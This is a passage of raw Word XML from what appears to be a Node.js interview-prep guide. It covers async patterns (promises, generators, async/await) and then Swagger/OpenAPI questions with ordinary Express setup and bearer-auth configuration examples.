    <w:p w14:paraId="239D396D" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B0DA05" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>query("SELECT clientId FROM clients WHERE clientName='picanteverde';",handleClient);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8E056" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Even though this code is much easier to read, and we created some functions that we can even reuse later, in some cases it may be appropriate to use a more robust solution in the form of </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. Promises allow additional desirable behavior such as error propagation and chaining. Node.js includes native support for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B31A02" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Additionally, a more supercharged solution to callback hell was provided by </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>generators</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, as these can resolve execution dependency between different callbacks. However, generators are much more advanced and it might be overkill to use them for this purpose. To read more about generators you can start with </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>this post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9A59B" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>However, these approaches are pretty dated at this point. The current solution is to </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>use async/await</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>—an approach that leverages Promises and finally makes it easy to flatten the so-called “pyramid of doom” shown above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D1A0B" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5B00ED" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360BBF2B" w14:textId="47D78D61" w:rsidR="0029395F" w:rsidRPr="00DA2F32" w:rsidRDefault="0029395F" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc178383243"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Miscellaneous Topics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="649D0547" w14:textId="0C14D8B9" w:rsidR="0029395F" w:rsidRPr="00DA2F32" w:rsidRDefault="0029395F" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc178383244"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Swagger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="24A1E214"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1. What is Swagger, and what are its main components?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716ADE0C" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>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Swagger is a framework for designing, building, documenting, and consuming RESTful APIs. Its main components include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD568D3" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Swagger UI:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A web-based UI that allows you to visualize and interact with your API's resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352320DF" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Swagger Editor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> An online tool for writing OpenAPI definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0EA06" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Swagger Codegen:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tool to generate client libraries, server stubs, API documentation, and other outputs from a Swagger definition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EA7F1" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SwaggerHub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A collaborative platform for designing and documenting APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4DB87F"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2. What is the OpenAPI Specification, and how does it relate to Swagger?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABA1D9" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The OpenAPI Specification (OAS) is a standard for defining RESTful APIs. It provides a language-agnostic way to describe the structure and behavior of an API. Swagger is built around the OAS, and it uses the specification to generate documentation, client SDKs, and other tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CE722"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3. How do you integrate Swagger with a Node.js/Express application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EBF360" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>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Swagger can be integrated with a Node.js/Express application using the swagger-jsdoc and swagger-ui-express packages. Here’s a basic example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CFB78"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5FC7F020"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swaggerJsDoc = require('swagger-jsdoc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453EB0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swaggerUi = require('swagger-ui-express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726CE2A7"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64022D1"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75849965"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AFD9FFD"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swaggerOptions = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEFA71E"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swaggerDefinition: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB0DA0"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openapi: '3.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2676AA56"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info: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31717EC8"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title: 'My API',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A199AD1"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version: '1.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73552DC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description: 'My API documentation',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CADE33"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2BB245D"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servers: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EFBD3"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CBF80D5"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url: 'http://localhost:5000',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE212E"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E0BA538"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FCE4870"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7BDA42A"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apis: ['./routes/*.js'], // Path to the API docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FB0EE"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94373D9"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BC0406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swaggerDocs = swaggerJsDoc(swaggerOptions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09743AFE"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app.use('/api-docs', swaggerUi.serve, swaggerUi.setup(swaggerDocs));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B07C7E3"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48C305A"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app.listen(5000, () =&gt; console.log('Server running on port 5000'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11279ADB" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This setup generates and serves the Swagger UI for your API based on JSDoc comments in your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C72D7"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4. How do you define API endpoints using Swagger in a Node.js application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E6D2F" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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API endpoints can be defined in the JSDoc comments within your route files. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E36FF62"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EF021A7"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@swagger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D47CF58"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/users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA4E57"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get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC449B"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summary: Retrieve a list of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870E8D1"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responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA0732A"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200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EF8E9"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description: A list of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FD6A3"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9EA1CCF"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app.get('/users', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755FF2C2"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 id: 1, name: 'John Doe' }]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0FA34"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3BB954D" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The @swagger annotation is used to describe the endpoint, its parameters, and its responses. These comments are then parsed by Swagger to generate the API documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B80EB"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5. What are the benefits of using Swagger for API development?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D77F5" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FE1DF" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Interactive Documentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides a web UI to interact with the API endpoints directly, making it easier to test and understand the API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9091F" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Standardization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensures a consistent and language-agnostic description of the API, which can be used across different platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFAD52" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Client Code Generation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatically generates client libraries in various languages, reducing the time needed to integrate with the API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39126F" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Collaboration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Makes it easier for teams to work together on API design and documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84F887"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6. How do you secure the API endpoints in Swagger?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F2278" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>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Security in Swagger is typically implemented using security schemes such as basicAuth, apiKey, oauth2, or bearerAuth. These schemes can be defined in the Swagger documentation and applied to specific endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34501FD5"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swaggerOptions = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1F0EB"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swaggerDefinition: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4263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openapi: '3.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BB4D9"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info: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575C12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title: 'My API',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218094BF"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version: '1.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD71C1B"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description: 'My API documentation',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E24E8"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DBA9DBE"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components: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B42441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securitySchemes: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BC7F4"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bearerAuth: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3872B70E"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type: 'http',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E55EA4"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scheme: 'bearer',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C8927"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bearerFormat: 'JWT',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD67343"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D109FDD"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1D1C8E9"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8157480"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security: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2334E1"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3B08889"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bearerAuth: [],</w:t>
      </w:r>
    </w:p>
